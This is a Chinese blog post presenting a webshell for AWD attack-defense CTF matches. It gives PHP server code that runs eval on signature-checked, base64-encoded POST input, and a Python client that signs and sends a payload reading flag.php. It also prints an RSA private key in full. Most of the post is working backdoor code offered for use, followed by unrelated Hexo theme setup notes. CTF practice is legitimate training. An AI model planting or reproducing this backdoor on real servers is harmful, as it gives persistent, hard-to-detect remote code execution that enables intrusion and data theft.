AWD中的RSA WebShell

 2019/05/10  Share

论如何在AWD中的安全的留shell :)

服务端代码

<?php
#Author: CBiu
$PUB_KEY = '-----BEGIN PUBLIC KEY-----
MIGeMA0GCSqGSIb3DQEBAQUAA4GMADCBiAKBgHw6fTCgWdoCEau6H5YDp66rH02U
AhhaBNFspmqSZCsBpYK+c6LyKlYRMYGGNlF7UA5cXAvcZFHHKoaQaHrPqrZ8hPCg
E2cjsYrzeUR79c/8rCQ6BndcF6CkRz15yaNmY7h8iknq3AofDEIG2O7y0IvJyOT5
0ebw7kIG4S1/aHiNAgMBAAE=
-----END PUBLIC KEY-----';
$pub_key = openssl_pkey_get_public($PUB_KEY);

$cmd = base64_decode($_POST['s']);
$sign = base64_decode($_POST['sign']);

if (!openssl_verify($cmd, $sign, $pub_key)){
	die('verify fail');
}

$result = str_split(eval($cmd), 117);
foreach($result as $o){
	openssl_public_encrypt($o, $sub_enc, $pub_key);
	$arr[]=$sub_enc;
}
$crypted = implode('', $arr);

openssl_free_key($pub_key);

echo base64_encode($crypted);

客户端代码

# pip install rsa
# Author: CBiu
import rsa
import base64
import requests

PRIV_KEY = '''-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgHw6fTCgWdoCEau6H5YDp66rH02UAhhaBNFspmqSZCsBpYK+c6Ly
KlYRMYGGNlF7UA5cXAvcZFHHKoaQaHrPqrZ8hPCgE2cjsYrzeUR79c/8rCQ6Bndc
F6CkRz15yaNmY7h8iknq3AofDEIG2O7y0IvJyOT50ebw7kIG4S1/aHiNAgMBAAEC
gYAH7tA5v7OdKU6pkawcr0UQ8VqBYLc1iOIP4YlK+ugsmuFP1QubVy1+64AmzkQ/
tckp8ZnrI/rAAiDkEOqrFQHIqHWscsMz8Tg/e5G8zrpZ/IDIX2AMMMxeVPGeTD5z
nw7o3aClT/mXJKp37RRy+l283QxssAKaloeVVD35Yd15gQJBAMv1AQddrh/dcp43
H77fw7w+ZX812AysFZkTgKfNc0qonRK5nX5L3r1XVQKdiQesEBsbRbNSmE59pg4v
7zw4yO0CQQCb7Wkdxx0A4XLQ3wYQRMzD5iMKT7NiOfyecYFe4HxbcD0V6yoH8WyD
UDPRnutnlNcGAzdhdLAh+Hp14/oRGJohAkEAyO6dzdjv83qiMdbS0qP2XN0H9zRf
ndRnDsDU7fwNCk9lN45f543taZHBMWtsFX/g+iN7HnhPjnxg/PcidKzo3QJAfZ5Q
dxr4dMMsOrXSLr0eshvv0tjOza2lpQgQj50O0qOjssrX+7o2D7xHYvNC9xnj+QYS
UcMuOs/x6JQX3DoTwQJASa60jvd9iF8fFsxfUylZt5nmpMxXao3cvem8yOG9bedz
P3rcz92tLUWvH6ggZBhGB+ABJFbmeB8ILIfGmHDChw==
-----END RSA PRIVATE KEY-----'''

payload = '''
return file_get_contents("flag.php");
'''

priv_key = rsa.PrivateKey.load_pkcs1(PRIV_KEY.encode())

sign = rsa.sign(payload.encode(), priv_key, 'SHA-1')

data = {
	"s": base64.b64encode(payload),
	"sign": base64.b64encode(sign)
}

r = requests.post("http://localhost/rsa.php", data=data)

crypted = base64.b64decode(r.content)

result = ""
for i in range(len(crypted) / 128):
	result += rsa.decrypt(crypted[i*128:(i+1)*128], priv_key).decode()

print(result)

概述

这里没有用私钥加密payload,仅做了验证
反正别人有公钥也能解密出payload(因为懒:))
执行后的返回结果用公钥加密，并且做了分块，不用担心数据过长的问题
源码地址：
https://github.com/CBiu/RSAWebShell/

参考

https://xz.aliyun.com/t/4640
https://www.jianshu.com/p/6280aa136292
https://stuvel.eu/python-rsa-doc/reference.html

Previous Post

2018总结

CATALOG

1. 服务端代码
2. 客户端代码
3. 概述
4. 参考



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true